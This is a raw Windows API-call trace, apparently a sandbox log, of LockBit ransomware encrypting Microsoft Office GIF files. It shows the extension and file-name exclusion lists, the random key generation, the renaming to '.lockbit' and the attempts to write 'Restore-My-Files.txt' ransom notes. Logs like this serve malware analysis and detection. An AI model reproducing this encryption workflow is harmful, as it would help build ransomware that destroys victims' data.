lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.025] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15273_.GIF") returned 1 [0204.026] lstrcmpiW (lpString1="ntldr", lpString2="BD15273_.GIF") returned 1 [0204.026] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15273_.GIF") returned 1 [0204.026] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15273_.GIF") returned 1 [0204.026] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15273_.GIF") returned -1 [0204.026] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15273_.GIF") returned 1 [0204.026] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15273_.GIF") returned 1 [0204.026] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.026] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF") returned=".GIF" [0204.026] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.026] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.026] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.027] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.027] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF.lockbit") returned 78 [0204.027] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15273_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0204.028] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.028] malloc (_Size=0x40068) returned 0x3df0008 [0204.028] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0204.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.029] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.032] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.032] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.032] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.032] free (_Block=0x1fa2ed8) [0204.032] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.032] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.032] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.032] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc998a500, ftCreationTime.dwHighDateTime=0x1bd4f3f, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc998a500, ftLastWriteTime.dwHighDateTime=0x1bd4f3f, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15274_.GIF", cAlternateFileName="")) returned 1 [0204.032] lstrcmpiW (lpString1=".", lpString2="BD15274_.GIF") returned -1 [0204.032] lstrcmpiW (lpString1="..", lpString2="BD15274_.GIF") returned -1 [0204.032] PathFindExtensionW (pszPath="BD15274_.GIF") returned=".GIF" [0204.033] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.033] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.033] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15274_.GIF") returned 1 [0204.034] lstrcmpiW (lpString1="ntldr", lpString2="BD15274_.GIF") returned 1 [0204.034] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15274_.GIF") returned 1 [0204.034] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15274_.GIF") returned 1 [0204.034] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15274_.GIF") returned -1 [0204.034] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15274_.GIF") returned 1 [0204.034] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15274_.GIF") returned 1 [0204.034] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.034] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF") returned=".GIF" [0204.034] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.034] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.034] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.035] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.035] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.035] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.035] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.035] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF.lockbit") returned 78 [0204.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15274_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0204.036] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.036] malloc (_Size=0x40068) returned 0x3df0008 [0204.036] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=208) returned 1 [0204.036] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.036] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.036] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.037] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.037] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.038] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.038] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.038] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0204.039] free (_Block=0x1fa2ed8) [0204.039] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.039] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.040] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7364b00, ftCreationTime.dwHighDateTime=0x1bd4f3f, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc7364b00, ftLastWriteTime.dwHighDateTime=0x1bd4f3f, nFileSizeHigh=0x0, nFileSizeLow=0x3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15275_.GIF", cAlternateFileName="")) returned 1 [0204.040] lstrcmpiW (lpString1=".", lpString2="BD15275_.GIF") returned -1 [0204.040] lstrcmpiW (lpString1="..", lpString2="BD15275_.GIF") returned -1 [0204.040] PathFindExtensionW (pszPath="BD15275_.GIF") returned=".GIF" [0204.040] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.040] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.040] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15275_.GIF") returned 1 [0204.041] lstrcmpiW (lpString1="ntldr", lpString2="BD15275_.GIF") returned 1 [0204.041] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15275_.GIF") returned 1 [0204.041] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15275_.GIF") returned 1 [0204.041] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15275_.GIF") returned -1 [0204.041] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15275_.GIF") returned 1 [0204.041] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15275_.GIF") returned 1 [0204.041] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.041] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF") returned=".GIF" [0204.041] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.041] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.041] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.042] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.042] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF.lockbit") returned 78 [0204.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15275_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.042] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.043] malloc (_Size=0x40068) returned 0x1ff1e60 [0204.043] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=63) returned 1 [0204.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0204.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0204.043] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 